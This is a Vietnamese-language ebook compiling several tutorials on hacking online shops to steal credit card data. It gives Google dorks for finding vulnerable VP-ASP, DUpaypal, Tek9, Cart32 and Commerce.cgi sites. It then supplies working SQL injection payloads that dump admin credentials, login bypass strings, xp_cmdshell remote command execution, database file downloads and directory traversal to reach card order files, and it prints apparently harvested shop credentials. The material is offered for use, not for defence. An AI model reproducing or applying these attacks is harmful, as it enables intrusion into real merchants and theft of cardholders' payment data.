Tải bản đầy đủ (.pdf) (66 trang)
  1. Trang chủ
    2. >>
  2. Công Nghệ Thông Tin
    3. >>
  3. Kỹ thuật lập trình

Ebook Hacking Credit Card

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.8 MB, 66 trang )

Ebook này được viết ra nhằm mục đích là
học hỏi và chia sẽ kiến thức.
Email:
Homepage:
Nội dung của ebook: hai tutorials do hieupc viết và một vài tutorials khác do
anh em bằng hữu viết, trong đó có một vài tutorials cũ nhưng cũng rất đáng
được đưa vào với mục đích để tham khảo.
Hacking Credit Card Version 2.0 --- Written by Hieupc
shopdisplayproducts.asp?
cat='
Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây
là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả
lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card.
Nào giờ chúng ta bắt ðầu bắt ðầu nhé.
Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như:
OLE DB, JET Database, ASP…
Býớc 1:
Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.
Từ khoá nên dùng:
allinurl:”shopdisplayproducts.asp?id=
hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2……
Search shop theo Domain .com, .net , .biz…..:
allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat=...
Ai biết chấm gì nữa thì thay vào :)
Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn.
Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack.
Býớc 2:
Ví dụ: lấy ví dụ là 1 site thế có dạng thế này :
/>Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5:
/>Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này:
Home Improvement


Page 1 of 2
Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem:
/>-->>> />Uh, nó lỗi ruì kìa:
5'
Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.
catdescription like '5'%' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 467
Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào:
'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password
/>Khi thêm xong thì sẽ nhý thế này:
/>201=1--sp_password
và ðýợc thế? này :
5' union select 1 from tbluser"having 1=1--sp_password
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 467
Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được.
Và cứ thế ta cứ tiếp tục thêm số nhé:
/>201=1--sp_password
/>%201=1--sp_password
/>20tbluser"having%201=1--sp_password
Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số.
Ở ðây là tới số 47 :
/>fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1--sp_password
3
click to see more 4
22

18
Please review these other products:
Nào giờ chúng ta bắt đầu lấy user and pass:
·
fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn
·
fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn
Sau khi thêm xong ta sẽ được nhý thế này:
/>fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1--sp_password
Và có được username và password :
User: stephenrossi
pass: gnilsur
Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được.
/>2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,
40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password
Ta sẽ có user và pass được gộp chung 1 số:
stephenrossi/gnilsur
Bước 3:
Tìm link admin, thử đánh cái này vào được không nào: hic không được rồi.
Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: , cũng
không được.
Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng
qua là thay table thôi.
Ta biết table
configuration

là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate,
afftemplateMerchant…..

Vậy cậu lệnh sẽ thế này:
'%20union%20%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,
42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Thay vào ta sẽ được:
/>201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,
42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Ta cũng thấy cái bảng:
3
click to see more 4
22
18
Please review these other products:
Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong
fieldvalue
, vì thế ta sẽ đặt fieldvalue vào số 3,
hay 4, hay 22 tuỳ các bạn.
'%20union%20%20select%201,2,3,
fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Sau khi thêm xong ta sẽ được thế này:
/>fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh,
nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang.
Page 1 of 10
Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong
fieldvalue
,
các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp:

shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin
shopaddmoretocart.asp
/>This site is reserved for Shop Administrators only.
Administrator's Login
UserName :
Password :
Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết.
THE END
Image Field
Hacking Credit Card Version 1.0 --- Written by Hieupc
Hack Shop VPASP thật sự là như thế nào?
( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây )
CÁCH THỨ 1: Cái này chắc có lẽ cũng có nhiều bạn biết, nếu mình đoán không lầm thě chỉ có 30 %-50 % member là
biết cách này, tuy nhiên mình cũng đưa lên đây cho các bạn chýa biết và các bạn đă biết rùi học hỏi thêm ở mình hoặc
góp ý thêm cho mình chỗ nào chưa hoàn chỉnh !
Cách này cũng như những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như
OLE DB, JET Database, ASP…
Bước 1: Ðể tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật
là hiệu quả. Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack :))
Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.
Từ khoá nên dùng:
allinurl:”shopdisplayproducts.asp?id=
hoặc allinurl:”shopdisplayproducts.asp?id=1 hoặc allinurl:”shopdisplayproducts.asp?id=2……
Search shop theo Domain .com, .net , .biz…..:
allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id=...
Ai biết chấm gì nữa thì thay vào :)
Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack.

Bây giờ mình lấy ví dụ shop này nhé:
/>Oh, 1 em Uk cực ngon không biết có CC.
Bây giờ kiểm tra xem nó lỗi không bằng cách thêm vào dấu phẩy ( ` )
/>Oh site bị lỗi kìa các bạn :
Products
Microsoft OLE DB Provider for ODBC Drivers

error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC,
cname'.
/chris/shop$db.asp, line 868
Bý?c 2:
Ta bắt đầu thêm vào đoạn code này :
%20union%20%20select%201%20from%20tbluser%27
Vào phía sau link shop nhớ bỏ luôn cái dấu phẩy sau ?id=1 nhé, nếu không là không được đâu đấy.
Khi thêm xong link sẽ như thế này:
/>20tbluser%27
Oh không dụ gì đây :)
Products
Microsoft OLE DB Provider for ODBC Drivers

error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not
match.
/chris/shop$db.asp, line 868
Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` )
mà nó hiện ra lỗi như vầy:
Microsoft OLE DB Provider for SQL Server

error '80040e14'

Unclosed quotation mark before the character string ' '.
/product.asp, line 29
Thì các bạn hack theo kiểu hack cũ nhé.
Thui bây giờ qua bước 3 nhé, nói nhiều quá :))
Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâu
chỉ uể oải 1 tí, đó là thêm số vào code:
1%20union%20%20select%201,2%20from%20tbluser%27
1%20union%20%20select%201,2,3%20from%20tbluser%27
1%20union%20%20select%201,2,3,4%20from%20tbluser%27………..
Khi thêm vào thì link sẽ như thế này :
/>20tbluser%27
/>20tbluser%27
/>20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng hãy cố lên.
Cho đến khi nó xuất hiện 1 cái bảng rất đẹp :))
Ái da, mỏi tay quá tới số 34 mới hiện ra cái bảng trời đánh này :))
/>201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser
%27
Đây là bước cuối cùng để lấy user and pass: những con số quan trọng của shop naỳ là : 3, 4 , 22.
fldusername <~ thay vào số 4
fldpassword <~ thay vào số 22
Sau khi thay xong link sẽ như thế này:
/>fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34%20from
%20tbluser%27
Và các bạn đã có user and pass rùi đấy:
User: admin848
pass: admin848
User: carste
pass: carste
Phần còn lại là tìm link admin để login, cái này cũng khá quan trọng vì không có link admin làm sao lấy CC :))
Chú ý: link admin để login mặc định của VPASP là : shopadmin.asp cũng có khi ta đánh shopadmin1.asp sẽ vào link

admin.
CÁCH HACK THỨ 2 RÚT RA TỪ BÀI HƯỚNG DẪN CỦA ANH HAI Silveryhat_Hacker :
Bước 1 tương tự như trên:
Ví dụ site này:
/>cũng thêm vào dấu phẩy ( ` ) để check lỗi
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi, giờ sao đây :))
Cái này anh em biết khai thác chứ:
/>201%20table_name%20from%20information_schema.tables))--sp_password
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type
int.
/shopping/shopdisplayproducts.asp, line 93
B
ước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie.
/>201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20
('ver_Faq','coupons','customerprices','customers')))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data
type int.
/shopping/shopdisplayproducts.asp, line 93
Tới đây là đã quá rõ, cái mình chính là table này : 'AdminUsers' vì sao vậy vì nó chưá user và pass chắc. Thui cứ khai
thác thử.

Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%
20where%20table_name=('AdminUsers')))--sp_password
Khi thêm code xong sẽ như thế này:
/>201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))--
sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data type
int.
/shopping/shopdisplayproducts.asp, line 93
Và bước tiếp theo:
Code : %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%
20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID')))--sp_password
Khi thêm code xong sẽ như thế này:
/>201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and
%20column_name%20not%20in%20('AdminID')))--sp_password
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Và các bạn cứ tiếp tục thêm table vào:
/>201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and
%20column_name%20not%20in%20('AdminID','login')))--sp_password
/>201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and
%20column_name%20not%20in%20('AdminID','login','pwd')))--sp_password
Okie 2 thông tin quan trọng là 'login','pwd' đă xuất hiện giờ chỉ việc kiếm pass:
Code: %20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))--
sp_password
ặc ặc shop củ khoai:

/>201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of data
type int.
/shopping/shopdisplayproducts.asp, line 93
Hic hic, user: admin , pass: admin ; đủ biết là shop này thằng admin nó ngu đến cỡ nào
Bây giờ kiếm link admin là nhiệm vụ của bạn.
TUTORIALS OF MY FRIENDS OR ORTHER AUTHORS
Tutorial ñöôïc vieát bôûi kidbandes
What you should look for? (Mục đích của việc tìm lỗi)
Tìm ra các trang cho phép bạn nhạp dữ liệu, ví dụ là login page, search page, .... Thỉnh thoảng, HTML page sử dụng
"Post" command để gởi thông số đến trang ASP khác. Vì vậy, bạn không thể thấy thông số trên thanh URL, và xem
"FORM" tag trong HTML code. Bạn có thể tìm vài thứ như đoạn code sau:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Mọi thứ giữa <FORM> và </FORM> có thông số lỗi được sử dụng.
What if you can't find any page that takes input? Bạn làm gì nếu không tìm ðýợc trang nhập liệu nào ?
Bạn nên tìm kiếm trang nhý ASP, JSP, CGI, hay PHP. Cố gắng tìm các URL vói các thông số sau:
/>How do you test if it is vulnerable? (Chúng ta kiểm tra lỗi như thế nào)
Bắt đầu với 1 dấu nháy đơn, thêm vào như sau: hi' or 1=1--
Nhập vào login hoặc password, hoặc ngay cả URL.
- login: hi' or 1=1--
- password: hi' or 1=1--
- or 1=1--
Nếu bạn làm như thế với 1 giá trị ẩn, phải download source HTML từ site, lưu vào đĩa cứng và chỉnh sửa URL và giá
trị ẩn. Ví dụ:
<form action= method=post>

<input type=hidden name=A value="hi' or 1=1--">
</form>
Nếu may mắn thì trên site của bạn, bạn sẽ lấy được đăng nhập nhng không co tên đãng nhập và mật mã
Nhưng tại sao dùng 'or 1=1-- ?
Chúng ta xem 1 ví dụ khác tại sao ' or 1=1-- lại quan trọng. Khác với việc vượt đăng nhập, nó có thể xem nhiều dữ liệu
hơn là với các thông tin thông thường. Lấy 1 trang ASP bạn sẽ thấy cái link như sau:
/>Trong URL, 'category' là 1 tên biến, và 'food' là giá trị gán cho biến ðó. Trong trường
hợp ðó, 1 trang ASP có thể chứa các đoạn code sau (OK, đây là ðoạn code được viết ra cho bài viết này):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr
Như chúng ta thấy, biến sẽ có giá trị v_cat bên trong và vì vậy câu lệnh SQL sẽ trở thành:
SELECT * FROM product WHERE PCategory='food'
Câu lệnh truy vấn trên sẽ đưa ra tất cả các giá trị với điều kiện là field PCategory là 'food'.
Bây giờ câu truy vấn sẽ nhý thế này:
or 1=1--
Bây giờ, giá trị của v_cat sẽ là "food' or 1=1-- ", nếu chúng ta chuyển ðổi thành câu lệnh SQL, chúng ta sẽ có:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
Câu truy vấn sẽ lọc ra các giá trị trong cột PCategory vói các giá trị là 'food'. Dấu "--" sẽ bỏ qua các truy vấn của
MSSQL . Thỉnh thoảng chúng ta cũng có thể sử dụng dấu "#".
Tuy nhiên, nếu hệ thống không co MSSQL hoặc chỉ đơn giản la truy vấn bình thường ta chỉ cần sử dụng
or 'a'='a
Câu lệnh SQL sẽ là :
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
Phụ thuộc vào câu truy vấn, ta sử dụng các giá trị sau:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a

') or ('a'='a
How do I get remote execution with SQL injection? (Phương pháp để thực thi lệnh từ xa với SQL)
Để có thể inject(nhập thêm) 1 lệnh SQL, chúng ta có thể thực hiện lệnh. Cài đặt mặc ðịnh trên MS SQL chạy dưới
quyền SYSTEM, là user với quyền truy cập Aministrator. Chúng ta có thể sử dụng để lưu trữ master..xp_cmdshell thực
hiện lệnh từ xa:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Thử dấu (") nếu dấu (') không làm việc.
Hai dấu trừ ở cuối dòng lệnh cho phép thực hiện một lệnh SQL mới. Ðể kiểm tra rằng câu lệnh này thực hiện được,
bạn có thể lắng nghe các gói tin ICMP từ 10.10.1.2, kiểm tra bất kỳ gói tin nào từ server:
#tcpdump icmp
Nếu bạn không nhận ðýợc bất kỳ gói tin từ server, và nhận 1 thông báo lỗi là không ðýợc quyền, thì có thể
Administrator đã giới hạn quyền người dùng truy cập vào hệ thống.
How to get output of my SQL query?(Phýõng pháp Lấy kết quả từ câu truy vẫn SQL)
Nếu có thể, bạn sử dụng sp_makewebtask để viết câu truy vấn thành câu lệnh HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.
TABLES"
Nhưng địa chỉ IP phải có thư mục được share cho tất cả mọi người
How to get data from the database using ODBC error message (Phương pháp Lấy dữ liệu từ CSDL sử dụng lỗi ODBC)
Chúng ta sử dụng thủ tục bị lỗi trong Server MS SQL để thực hiện lệnh. Xem ví dụ sau:
/>Chúng ta cố gắng kết hợp UNION trong '10' với 1 câu lệnh khác:
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.
TABLES--
Bảng hệ thống INFORMATION_SCHEMA.TABLES chứa thông tin của tất cả các bảng trong hệ thống.
TABLE_NAME field chứa tất cả các tên của bảng trong hệ thống. Nó luôn luôn tồn tại theo cách mặc định. Câu truy
vấn sẽ là:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Ðiều này se trả về bảng đầu tiên trong bảng INFORMATION_SCHEMA_TABLES. Khi chúng ta UNION giá trị này
với số nguyên 10, MS SQL Server sẽ cố gắng chuyển đổi giá trị chuỗi (nvarchar) thành 1 số nguyên. Thủ tục này bị
lỗi, bởi vì không thể thục hiện chuyển đổi từ nvarchar thành int. Server sẽ xuất hiện lỗi sau:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of
data type int.
/index.asp, line 5
Thông báo lỗi đủ để biết được là không thể chuyển ðổi giá trị chuỗi thành số. Trong trường hợp này, chúng ta có thể
lấy được tên table đầu tiên là "table1".
Để lấy table tiếp theo ta có thể sử dụng lệnh sau:
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.
TABLES WHERE TABLE_NAME NOT IN ('table1')--
Chúng ta cũng có thể sử dụng nó bằng lệnh LIKE:
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.
TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a
column of data type int.
/index.asp, line 5
Giá trị trong phù hợp, '%25login%25' sẽ được xem nhý là %login% trong SQL Server. Trong trường hợp này, ta có thể
lấy tên đầu tiên trong table có giá trị phù hợp là, "admin_login".
How to mine all column names of a table? (Cách lấy tất cả tên cột trong table)
Chúng ta có thể sử dụng table khác INFORMATION_SCHEMA.COLUMNS để ánh xạ tất cả các cột của table:
UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column
of data type int.
/index.asp, line 5
Bây giờ chúng ta có cột đầu tiên trong table, chúng ta sử dụng NOT IN () để lấy cột tiếp theo:
UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT

IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a
column of data type int.
/index.asp, line 5
Khi chúng ta tiếp tục có thể sẽ thu được một số cột cần thiết như là "password", "details". Chúng ta sẽ biết được nội
dung khi sử dụng câu truy vấn sau:
Quote:
UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT
IN ('login_id','login_name','password',details')--
Output:
Quote:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement
contains a UNION operator.
/index.asp, line 5
How to retrieve any data we want? (phương pháp lấy tất cả dữ liệu mình muốn)
Bây giờ chúng ta sẽ xem xét 1 số table quan trọng, và các field của nó, Chúng ta cũng sử dụng cùng kỹ thuật trên ðể
lấy dữ liệu cần thiết trong CSDL .
Bây giờ chúng ta lấy giá trị đầu tiên trong cột login_name từ bảng "admin_login":
UNION SELECT TOP 1 login_name FROM admin_login--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'kidbandes' to a
column of data type int.
/index.asp, line 5
Tên của user admin là "kidbandes". Cuối cùng chúng ta lấy thêm password của "kidbandes" trong CSDL
UNION SELECT TOP 1 password FROM admin_login where
login_name='kidbandes'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'loverthu' to a column
of data type int.
/index.asp, line 5
bây giờ chúng ta có thể đãng nhập với tên "kidbandes" và password "lovethu".
How to get numeric string value? (phương pháp lấy giá trị chuỗi s&#7889
Có 1 sự giới hạn trong kỹ thuật ở trên. Chúng ta không thể lấy được bất kỳ câu lệnh lỗi nào nếu chúng ta chuyển đổi
kiểu chuỗi thành bất kỳ kiểu số nào (các ki tự 0-9). Chúng ta cố gắng lấy password của "kimthu" mà nó là số
"123456":
UNION SELECT TOP 1 password FROM admin_login where
login_name='trinity'--
Thông thường chúng ta sẽ nhập được thông báo là "Page Not Found". Nguyên nhân ở đây là password của "kimthu" là
"123456" sẽ không thể chuyển đổi, trước UNION với 1 số (10 in this case). bới vì đây là 1 câu lệnh UNION đúng,
SQL server sẽ không quãng lỗi ODBC, và vì vậy chúng ta sẽ không thể lấy được thông báo lỗi.
Ðể giải quyết vấn đề này, Chúng ta có thể dùng một ki tu chuỗi để làm cho câu lệnh truy vấn lỗi. Chúng ta cố gắng
thực hiện câu truy vấn sau:
UNION SELECT TOP 1 convert(int, password%2b'%20anhyeuem') FROM
admin_login where login_name='trinity'--
Chúng ta sử dụng dấu (+) để kết hợp password với 1 giá trị chuỗi mà chúng ta muốn. (ASSCII code for '+' = 0x2b).
Chúng ta sẽ kết hợp với '(space)morpheus' thành 1 password thực. Vì vậy, ngay cả với password là một chuỗi số
'123456', Nó cũng sẽ trở thành '123456 anhyeuem' bằng cách ðõn giản gọi lệnh convert(), sau đó cố gắng chuyển đổi
'123456 anhyeuem' thành 1 số, SQL Server sẽ xuất hiện lỗi ODBC:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '123456 anhyeuem' to
a column of data type int.
/index.asp, line 5
How to update/insert data into the database? (phương pháp Update/Insert dữ liệu vào CSDL)
Khi chúng ta thành công trong việc thu thập thông tin từ CSDL, ðiều này có nghĩa chúng ta có thể UPDATE hoặc ngay
cả INSERT một record mới trong table. Ví dụ chúng ta có thể thay password của "kidbandes":

UPDATE 'admin_login' SET 'password' = 'lovethu' WHERE
login_name='kidbandes'--
Để INSERT dữ liệu mới vào CSDL:
INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details')
VALUES (666,'kidbandes2','lovethu','NA')--
Bây giờ chúng ta có thể đăng nhập với "kidbandes2" và password "lovethu".
date : 29/05/2005 TG kidbandes newbie of Thecorrs Family

TUTORIAL FORM jonnyhackstuff
Mức độ nguy hiểm : khá cao
tỷ lệ thành công :80%
Tool :+ site />+ PC của bạn cài Access ( dùng để xem file .mdb)
Hiện các Shop DUpaypal rất nhiều và hàu như chưa fix được mấy bằng chứng là tấn công 10 site thì 8 site dính :D)
Tiến hành:
Lên Search với từ khóa "Powered by DUpaypal -siteduware.com"
bạn sẻ thấy rất nhiều site dính Bug này, Chọn victim để test nào
ở đây kieptinhchung chọn cái này:
/>bi giờ thêm vào sau Nó :
../_private/DUpaypal.mdb
để Dowload file chứa thông tin về U/P của Admin về , tức là ta sẻ dùng link sau để dowload nó:
/>sau khi dowload về bạn sẻ xem Nó dưới dạng Accees, tìm phần User và lấy user+pass đăng nhập
thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó.
TUTORIAL BY HCEGROUP
I-Lỗi Tek9.asp :
Cách thức tìm : Dùng Google
Câu tìm kiếm : tek9.asp
Kết quả : Bạn tìm các trang web hiện lên , ví dụ làhttp://198.170.250.68/ tek9_login.asp
Bạn sẽ thêm intranet trước tek9.asp
http://198.170.250.68/intranet/tek9_login.asp
Được gì ? Bạn vào trang đăng nhập của người quản trị.

Tên và mật khẩu : Đều là 'or''='
Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau. Trang trên cho phép bạn quản lý thông số ,
kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng. Ngòai ra bạn có thể tìm lệnh Find orders
để truy tìm khu vực chức thẻ.
============================
II-Lỗi Cart32 v3.5a
Cách thức tìm : Dùng Google
Câu tìm kiếm : Cart32 v3.5a
Kết quả : Chạy các trang web có tập tin cart32.exe . Bạn sẽ nhận được 1 số thông tin
Được gì ? Chưa được gì hết
Tên và mật khẩu : Không cần
Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi
/>Bạn thay từ card32.exe bằng những dòng sau đây :
I)
..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
II)
..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
III)
..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
Ví dụ :
/>-Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng :
\progra~1\MWAInc\Cart32\
-Bạn sẽ thấy những dòng giống như sau :
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta
sẽ có giống như thế này :
/>\Cart32\2814659000-001001.c32
============================

III-Lỗi Commerce.cgi
Cách thức tìm : Dùng Google
Câu tìm kiếm : Commerce.cgi
Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi
/>Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl
Ví dụ :
/> Bạn sẽ nhận được 1 số thông tin :
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = " />$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
